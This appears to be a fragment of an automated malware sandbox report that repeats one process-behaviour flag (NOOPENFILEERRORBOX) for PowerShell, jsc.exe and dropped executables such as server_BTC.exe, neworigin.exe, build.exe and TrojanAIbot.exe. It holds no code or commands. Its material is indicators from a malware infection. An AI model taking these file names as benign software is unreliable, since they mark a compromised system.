Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
